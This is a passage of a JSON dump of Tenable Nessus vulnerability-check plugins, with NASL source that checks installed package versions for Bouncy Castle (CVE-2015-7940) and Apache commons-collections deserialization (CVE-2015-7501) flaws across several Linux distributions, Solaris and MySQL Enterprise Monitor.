audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1 / 13.2 / 42.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bouncycastle-1.53-8.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bouncycastle-javadoc-1.53-8.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bouncycastle-1.53-13.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bouncycastle-javadoc-1.53-13.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"bouncycastle-1.53-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"bouncycastle-javadoc-1.53-16.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bouncycastle / bouncycastle-javadoc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:37:06", "description": "Security fix for CVE-2015-7940\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-03-04T00:00:00", "type": "nessus", "title": "Fedora 22 : bouncycastle-1.50-8.fc22 (2015-7d95466eda)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7940"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:bouncycastle", "cpe:/o:fedoraproject:fedora:22"], "id": "FEDORA_2015-7D95466EDA.NASL", "href": "https://www.tenable.com/plugins/nessus/89298", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-7d95466eda.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89298);\n script_version(\"2.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-7940\");\n script_xref(name:\"FEDORA\", value:\"2015-7d95466eda\");\n\n script_name(english:\"Fedora 22 : bouncycastle-1.50-8.fc22 (2015-7d95466eda)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2015-7940\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1276272\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-January/174915.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?98f40c66\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected bouncycastle package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bouncycastle\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"bouncycastle-1.50-8.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bouncycastle\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T16:36:53", "description": "Indexing and Search Service 1u5-29.15600: core patch.\nDate this patch was last updated by Sun : Jan/07/17", "cvss3": {}, "published": "2018-03-12T00:00:00", "type": "nessus", "title": "Solaris 10 (sparc) : 142824-29", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7940"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:solaris:10:142824", "cpe:/o:oracle:solaris:10"], "id": "SOLARIS10_142824-29.NASL", "href": "https://www.tenable.com/plugins/nessus/107538", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(107538);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-7940\");\n\n script_name(english:\"Solaris 10 (sparc) : 142824-29\");\n script_summary(english:\"Check for patch 142824-29\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 142824-29\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Indexing and Search Service 1u5-29.15600: core patch.\nDate this patch was last updated by Sun : Jan/07/17\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/142824-29\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Install patch 142824-29 or higher\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-7940\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:142824\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"sparc\") audit(AUDIT_ARCH_NOT, \"sparc\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"142824-29\", obsoleted_by:\"\", package:\"SUNWjiss\", version:\"1.0,REV=2009.09.09\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SUNWjiss\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:50:04", "description": "According to its self-reported version, the MySQL Enterprise Monitor application running on the remote host is 3.1.x prior to 3.1.6.7959.\nIt is, therefore, affected by a remote code execution vulnerability in the JMXInvokerServlet interface due to improper validation of Java objects before deserialization. An authenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2015-7501)", "cvss3": {}, "published": "2017-01-25T00:00:00", "type": "nessus", "title": "MySQL Enterprise Monitor 3.1.x < 3.1.6.7959 Java Object Deserialization RCE (January 2017 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2019-11-13T00:00:00", "cpe": ["cpe:/a:oracle:mysql_enterprise_monitor"], "id": "MYSQL_ENTERPRISE_MONITOR_3_1_6_7959.NASL", "href": "https://www.tenable.com/plugins/nessus/96768", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(96768);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\"CVE-2015-7501\");\n script_bugtraq_id(78215);\n script_xref(name:\"CERT\", value:\"576313\");\n\n script_name(english:\"MySQL Enterprise Monitor 3.1.x < 3.1.6.7959 Java Object Deserialization RCE (January 2017 CPU)\");\n script_summary(english:\"Checks the version of MySQL Enterprise Monitor.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host is affected by a remote\ncode execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the MySQL Enterprise Monitor\napplication running on the remote host is 3.1.x prior to 3.1.6.7959.\nIt is, therefore, affected by a remote code execution vulnerability in\nthe JMXInvokerServlet interface due to improper validation of Java\nobjects before deserialization. An authenticated, remote attacker can\nexploit this to execute arbitrary code. (CVE-2015-7501)\");\n # https://dev.mysql.com/doc/relnotes/mysql-monitor/3.1/en/news-3-1-6.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0752b1b7\");\n # http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html#AppendixMSQL\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a1c38e52\");\n # https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9c6d83db\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MySQL Enterprise Monitor version 3.1.6.7959 or later as\nreferenced in the January 2017 Oracle Critical Patch Update advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:U/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:U/RC:X\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-7501\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/25\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:mysql_enterprise_monitor\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mysql_enterprise_monitor_web_detect.nasl\");\n script_require_keys(\"installed_sw/MySQL Enterprise Monitor\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 18443);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\napp = \"MySQL Enterprise Monitor\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\nport = get_http_port(default:18443);\n\ninstall = get_single_install(app_name:app, port:port, exit_if_unknown_ver:TRUE);\nversion = install['version'];\ninstall_url = build_url(port:port, qs:\"/\");\n\nfix = \"3.1.6.7959\";\nvuln = FALSE;\nif (version =~ \"^3\\.1($|[^0-9])\" && ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\n vuln = TRUE;;\n\nif (vuln)\n{\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, version);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T15:45:30", "description": "It was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library.", "cvss3": {}, "published": "2015-12-15T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : apache-commons-collections (ALAS-2015-618)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2018-04-18T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:apache-commons-collections", "p-cpe:/a:amazon:linux:apache-commons-collections-javadoc", "p-cpe:/a:amazon:linux:apache-commons-collections-testframework", "p-cpe:/a:amazon:linux:apache-commons-collections-testframework-javadoc", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2015-618.NASL", "href": "https://www.tenable.com/plugins/nessus/87344", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2015-618.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(87344);\n script_version(\"2.12\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2015-7501\");\n script_xref(name:\"ALAS\", value:\"2015-618\");\n\n script_name(english:\"Amazon Linux AMI : apache-commons-collections (ALAS-2015-618)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was found that the Apache commons-collections library permitted\ncode execution when deserializing objects involving a specially\nconstructed chain of classes. A remote attacker could use this flaw to\nexecute arbitrary code with the permissions of the application using\nthe commons-collections library.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2015-618.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update apache-commons-collections' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:apache-commons-collections\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:apache-commons-collections-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:apache-commons-collections-testframework\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:apache-commons-collections-testframework-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"apache-commons-collections-3.2.1-11.9.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"apache-commons-collections-javadoc-3.2.1-11.9.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"apache-commons-collections-testframework-3.2.1-11.9.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"apache-commons-collections-testframework-javadoc-3.2.1-11.9.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache-commons-collections / apache-commons-collections-javadoc / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T15:45:52", "description": "Updated packages for the Apache commons-collections library for Red Hat JBoss Enterprise Application Platform 5.2, which fix one security issue, are now available for Red Hat Enterprise Linux 4, 5, and 6.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nRed Hat JBoss Enterprise Application Platform 5 is a platform for Java applications based on JBoss Application Server 6.\n\nIt was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library. (CVE-2015-7501)\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of Red Hat JBoss Enterprise Application Platform 5.2 on Red Hat Enterprise Linux 4, 5, and 6 are advised to upgrade to these updated packages. The JBoss server process must be restarted for the update to take effect.", "cvss3": {}, "published": "2015-12-04T00:00:00", "type": "nessus", "title": "RHEL 5 / 6 : JBoss EAP (RHSA-2015:2535)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections", "p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-tomcat5", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2015-2535.NASL", "href": "https://www.tenable.com/plugins/nessus/87190", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:2535. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(87190);\n script_version(\"2.21\");\n script_cvs_date(\"Date: 2019/10/24 15:35:40\");\n\n script_cve_id(\"CVE-2015-7501\");\n script_xref(name:\"RHSA\", value:\"2015:2535\");\n\n script_name(english:\"RHEL 5 / 6 : JBoss EAP (RHSA-2015:2535)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated packages for the Apache commons-collections library for Red\nHat JBoss Enterprise Application Platform 5.2, which fix one security\nissue, are now available for Red Hat Enterprise Linux 4, 5, and 6.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nRed Hat JBoss Enterprise Application Platform 5 is a platform for Java\napplications based on JBoss Application Server 6.\n\nIt was found that the Apache commons-collections library permitted\ncode execution when deserializing objects involving a specially\nconstructed chain of classes. A remote attacker could use this flaw to\nexecute arbitrary code with the permissions of the application using\nthe commons-collections library. (CVE-2015-7501)\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of Red Hat JBoss Enterprise Application Platform 5.2 on Red\nHat Enterprise Linux 4, 5, and 6 are advised to upgrade to these\nupdated packages. The JBoss server process must be restarted for the\nupdate to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/solutions/2045023\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:2535\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-7501\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected jakarta-commons-collections and / or\njakarta-commons-collections-tomcat5 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-tomcat5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:2535\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! (rpm_exists(release:\"RHEL5\", rpm:\"jbossas-welcome-content-eap\") || rpm_exists(release:\"RHEL6\", rpm:\"jbossas-welcome-content-eap\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"JBoss EAP\");\n\n if (rpm_check(release:\"RHEL5\", reference:\"jakarta-commons-collections-3.2.1-5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jakarta-commons-collections-tomcat5-3.2.1-5.ep5.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"jakarta-commons-collections-3.2.1-5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jakarta-commons-collections-tomcat5-3.2.1-5.ep5.el6\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jakarta-commons-collections / jakarta-commons-collections-tomcat5\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:38:48", "description": "The version of Oracle Application Testing Suite installed on the remote host is affected by a remote code execution 